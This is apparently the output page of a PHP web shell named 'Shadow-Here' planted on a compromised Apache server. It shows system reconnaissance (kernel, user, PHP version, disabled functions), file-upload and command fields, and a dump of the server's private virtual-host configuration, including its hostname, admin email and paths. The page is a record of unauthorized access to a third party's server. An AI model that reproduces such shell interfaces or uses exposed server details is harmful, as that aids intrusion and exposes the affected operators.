Shadow-Here


Server : Apache
System : Linux methusalix2 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
User : hios ( 1437)
PHP Version : 5.6.40-0+deb8u12
Disable Function : proc_close,proc_open,dl,shell_exec,passthru
Directory :  /etc/apache2/sites-enabled/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :
Current File : //etc/apache2/sites-enabled/000-default
###################################################
# global defaults

RequestReadTimeout header=10-20,MinRate=500 body=20,MinRate=500

ServerAdmin hostmaster@methusalix.koerbler.com
LimitUIDRange 33 6000
LimitGIDRange 33 6000

<Directory />
  Options -Indexes
  Order allow,deny
  Allow from all
</Directory>

ServerName methusalix.koerbler.com

# /global defaults
####################################################


# ---------------------------------------------------------------
# DEFAULT NON-SSL
# ---------------------------------------------------------------
<VirtualHost *:80>

	DocumentRoot /home/cosmo/public_html/
	
	php_admin_value open_basedir "/tmp:/usr/lib/php:/var/tmp:/var/www:/usr/share/php:/usr/share/pear:/var/lib/php5:/var/lib/php:/home/staff/phpMyAdmin/current"

	<Directory />
		Options FollowSymLinks
		AllowOverride None
	</Directory>

        CustomLog  /home/cosmo/logs/access.log combined
        ErrorLog   /home/cosmo/logs/error.log

        AssignUserId cosmo www-data


	# Possible values include: debug, info, notice, warn, error, crit,
	# alert, emerg.
	LogLevel warn

	#CustomLog /var/log/apache2/access.log combined
	ServerSignature Off
	
	Alias /icons/ "/usr/share/apache2/icons/"
	<Directory "/usr/share/apache2/icons">
	    Options Indexes MultiViews
	    AllowOverride None
	    Order allow,deny
	    Allow from all
	</Directory>


# ---------------------------------------------------------------
# ENDE DEFAULT NON-SSL
</VirtualHost>
# ---------------------------------------------------------------

Samx